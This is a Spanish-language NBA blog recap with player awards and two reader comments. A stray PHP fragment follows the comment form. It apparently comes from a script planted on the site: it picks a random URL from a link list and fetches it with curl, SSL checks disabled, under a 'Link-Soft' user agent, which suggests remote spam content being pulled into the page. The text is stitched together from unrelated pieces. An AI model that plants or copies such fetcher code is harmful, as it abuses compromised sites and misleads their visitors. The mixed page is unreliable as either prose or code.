La Crónica (22/01/2010)

23 de January de 2010 por Viva_Dirk

Como cada sábado tenemos un monton de cosas que contar. Jugaron buena parte de los favoritos y todos cumplieron, también hubo sorpresas y partidos de la zona mas baja posible. Pero vamos a empezar con el duelo entre 2 de los equipos que más molan ahora mismo de toda la liga. El Memphis – Oklahoma presentaba a dos equipos muy jóvenes con ganas de comerse el mundo y aunque el partido fue más defensivo de lo esperado la tensión fue máxima hasta el final, donde los ositos se llevaron el gato al agua gracias al habitual gran partido de Randolph con Marc y Gay como excelentes secundarios. En especial este último con un pedazo de buzzer-beater por encima de Durant de superclase.

Lakers, Celtics y Magics ganaron sus partidos. Boston, en el regreso de Garnett a las canchas y a pesar de las grandes actuaciones de Rondo y Pierce, tuvo serias dificultades ante unos Blazers en los que Miller hizo de Roy. En cambio, Lakers y Magics no tuvieron excesivos problemas frente a Knicks y Kings respectivamente, con buenos partidos de Gasol y Howard.

Las sorpresas de la noche fueron 3 siendo la mayor de todas ellas la victoria de los Sixers frentre a Dallas. En los Mavs nadie pasó de los 15 puntos y tuvieron un 39.5% en tiros de campo. Frente a eso poco les hizo falta a unos Sixers en los que el mejor fue T. Young. En el duelo tejano Houston amargó los 20.000 puntos de Duncan, cargándose a los Spurs con una aportación de 53 puntos desde el banco. Además, los Bulls asaltaron el US Airways de Phoenix con un tremendo partido de Rose frente a Nash.

El partido estrella de la noche bien podía ser el Bobcats – Hawks que se llevaron los de Atlanta gracias a una mejor circulación del balón y un mayor acierto en el tiro. Toronto ganó a los Bucks con un gran Jack secundado por Bosh y Belinelli. Miami se aprovechó del polvorín que son los Wizars para ganarles por 24 con una buena actuación de casi todo el quinteto titular. New Orleans ganó sufriendo a los Wolves gracias a Paul y una buena aportación de los suplentes.

En los duelos en el fango, Pacers y Warriors ganaron facilmente a Pistons y Nets. Lo de estos últimos  fue absolutamente vergonzoso, con un 35% en tiros de campo y 79 puntos anotados mientras su rival anotaba un 52% y 111 puntos. Mayor pecado si tenemos en cuenta que Nelson alineaba a 3 fichajes de la D-League.

PREMIOS TJNBA:

MVP: Dos tipos que este año se están prodigando poco por estos lares y que, se dice, podrían ser compañeros el curso próximo. Derrick Rose se cascó ante Steve Nash 32 puntos, 3 rebotes y 5 asistencias. Wade hizo lo mismo pero con 5 asistencias más.

El Rookie: Venís pidiendo que hablemos de él y él además se lo gana. Con Ellis lesionado, Stephen Curry se cargó al equipo a la espalda para destrozar a los Nets con 32 puntos y 7 asistencias.

La sorpresa: Kyle Lowry hizo y deshizo ante la impotencia de los sistemas defensivos de Popovic. Tremendos 23 puntos, 6 rebotes, 9 asistencias y 2 robos del base suplente en los Rockets. Las cartas que se saca de la manga Nelson también son alucinantes, aunque en su caso no podemos asegurar que sea una sorpresa.

La decepción: Entre Dirk Nowitzki y Jason Terry se marcaron un 6 de 25 y 0 de 6 en triples. Parece que no se habían levantado con el pie derecho.

El mayor esfuerzo en vano: David Lee, con 31 puntos y 17 rebotes demostró una vez más que no es oro todo lo que reluce en el juego interior de los actuales campeones.

Comenta

2 comentarios a esta entrada

  1. M dice:
    #1

    Juer, que grandes los Grizzlies, les dábamos por el cachondeo padre y están enormes. Mi equipo favorito para este año, ¡¡hala!!. Randolph se debe aburrir allí, pero le viene bien. Como no lo llevan al All-star, se confirmará lo que todos ya tenemos confirmado, con respecto al evento.

      Citar

  2. aro_pasado_no_newtoniano dice:
    #2

    El equipaje de Houston me recuerda al del Limoges de Maljkovic y Michael Young…Tremendo..

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>